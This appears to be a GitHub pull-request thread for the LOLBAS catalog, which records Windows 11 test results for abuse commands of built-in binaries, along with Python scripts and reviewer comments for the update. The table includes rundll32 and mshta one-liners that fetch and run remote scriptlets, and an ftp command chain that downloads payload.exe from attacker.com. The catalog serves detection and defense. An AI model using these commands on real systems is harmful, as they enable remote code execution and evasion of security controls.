| Rundll32.exe | `rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");` | ✔️ | | |
| Rundll32.exe | `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}` | ✔️ | | |
| Rundll32.exe | `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")` | ✔️ | | |
| Rundll32.exe | `rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain` | ✔️ | | |
| Rundll32.exe | `rundll32.exe -sta {CLSID}` | ✔️ | | |
| Runscripthelper.exe | `runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test` | Not tested | | Could not be located (searched under `c:\windows\`) |
| Replace.exe | `replace.exe C:\Source\File.cab C:\Destination /A` | ✔️ | | |
| Replace.exe | `replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A` | ✔️ | | |
| Mshta.exe | `mshta.exe evilfile.hta` | ✔️ | | |
| Mshta.exe | `mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))` | ❌ | | Nothing seems to happen |
| Mshta.exe | `mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();` | ✔️ | | |
| Mshta.exe | `mshta.exe "C:\ads\file.txt:file.hta"` | ❌ | | Remains blank |
| Ftp.exe | `echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt` | ✔️ | | |
| Ftp.exe | `cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"` | ✔️ | | |
| WorkFolders.exe | `WorkFolders` | ✔️ | | |
| Presentationhost.exe | `Presentationhost.exe C:\temp\Evil.xbap` | ❌ | | Opens Edge, blocks download… @api0cradle what are your thoughts? |
| Pnputil.exe | `pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf` | ✔️ | ⚠️ | Signature required, GUI-based. Is expected behaviour… Is this a lolbin? |
For the record, this was my approach:

- Get a CSV with all commands that should be OS-native (i.e. everything except `OtherMSBinaries`).

  ```python
  import csv, glob, yaml

  # Find all YML files (skipping OtherMSBinaries, which are not OS-native)
  data = []
  for path in glob.glob('yml/**/*.yml', recursive=True):
      if 'OtherMSBinaries' in path:
          continue
      with open(path, encoding='utf-8') as f:
          data.append(list(yaml.safe_load_all(f))[0])

  with open('review.csv', 'w', newline='', encoding='utf-8') as f:
      csvw = csv.writer(f)
      csvw.writerow(['Name', 'Command', 'Outcome', 'Needs Changing', 'Comments'])
      # Iterate over entries
      for entry in data:
          # Iterate over commands
          for command in entry['Commands']:
              # Write commands to CSV in defined format
              csvw.writerow([entry['Name'], command['Command'], '', '', ''])
  ```

- Review every entry by executing the command in a Windows 11 VM. Note that often the command needs slight tweaking, e.g. to point to your own DLL/CLSID/HTTP server etc.
  - Track your progress in `review.csv`, generated in the previous step.
    - If a command is found to be working, update the `Outcome` column to `Works`. Otherwise, use `Does not work` or a custom text.
    - When there is an opportunity to improve the entry, set `Needs changing` to `Yes`. Otherwise leave empty or put `No`.
    - If any comments apply, put them in the `Comments` column.

- Add `Windows 11` to the `OperatingSystem` fields of the commands that were found to be working.

  (Rather than using the `yaml` package, which will inadvertently update the formatting/structure and possibly even order of the file, I went with the simple regex approach to make sure the changes made to the file are minimal.)

  ```python
  import csv, glob, re

  # Obtain & parse review results
  with open('review.csv', encoding='utf-8') as f:
      outcome_data = {x['Command']: x['Outcome'] for x in csv.DictReader(f)}

  # Find all YML files
  files = glob.glob('yml/**/*.yml', recursive=True)

  totalhits = 0
  expected_commands = set(outcome_data.keys())

  # Iterate over YML files
  for file in files:
      with open(file, 'r+', encoding='utf-8') as f:
          # Get contents
          data = f.read()
          # Find all commands: the 'Command:' line up to and including the
          # 'OperatingSystem:' line of the same command block
          hits = re.findall(r'(Command: (.+?)\n.*?OperatingSystem: (.+?))\n', data, re.DOTALL)
          # Iterate over found commands
          for block, command, os_field in hits:
              # Check if we reviewed the command
              outcome = outcome_data.get(command)
              if outcome and outcome.strip().lower() == 'works':
                  # Remove from list of commands we expect to see
                  if command in expected_commands:
                      expected_commands.remove(command)
                  totalhits += 1
                  # Easiest scenario: OS ends with 'Windows 10'
                  if os_field.endswith('Windows 10'):
                      # Simply append
                      data = data.replace(block, block + ", Windows 11")
                  # If not, check if Windows 11 is not already mentioned
                  elif 'Windows 11' not in os_field:
                      # If so, append, but add '(!!!)' as these need manual review
                      data = data.replace(block, block + ", Windows 11 (!!!)")
                  else:
                      print('Warn: Windows 11 already present')
          # Update the file
          f.seek(0)
          f.write(data)
          f.truncate()

  print("Processed {} (expected: {})".format(totalhits, len(outcome_data)))

  # Display the commands that _weren't_ updated but require updating
  for k in expected_commands:
      o = outcome_data.get(k)
      if o.strip().lower() == 'works':
          print(k)
  ```

- Finally, use a simple Excel formula to generate a markdown table for the Pull Request.

  You should have something like this:

  |   | A | B | C | D | E |
  |---|---|---|---|---|---|
  | 1 | Name | Command | Outcome | Needs Changing | Comments |
  | 2 | somename.exe | some.exe command | Works | | As expected |
  | 3 | ... | ... | ... | ... | ... |

  Put the below in F2 and drag down to the end.

  ```
  ="|"&A2&"|`"&SUBSTITUTE(B2,"|", "\|")&"`|"&IF(C2="Works","✔️", IF(C2="Does not work", "❌", C2))&"|"&IF(D2="Yes","⚠️️", "")&"|"&E2&"|"
  ```
@wietze this is excellent work! Attached are some comments for the Sprint. I reviewed as many as I could with a bias toward some of the ones I am more familiar with. I hope this helps!
Couple of changes in b92ee99627d84fd17697e513960a3c423ff2dd34 :
- Updated Msbuild w/ RSP entry to reflect masquerading aspect;
- Removed dead payload links from Mshta entries (linking to @bohops gist in code sample section instead)
- Removed redundant wmic proc/call/create entries
- Changed ieadvpack/advpack entries back to 'Privileges: User'
- Removed quotes from comsvcs/minidump command line (caused issues when executing with cmd.exe)
- Improved winrm.vbs entry description
- Added Windows 11 to entries identified as working by @bohops
@wietze, if you would like help resolving these, I would like to help if I can.
Updated this branch to be up to date with the master branch, ready for re-review/merging :)
LGTM.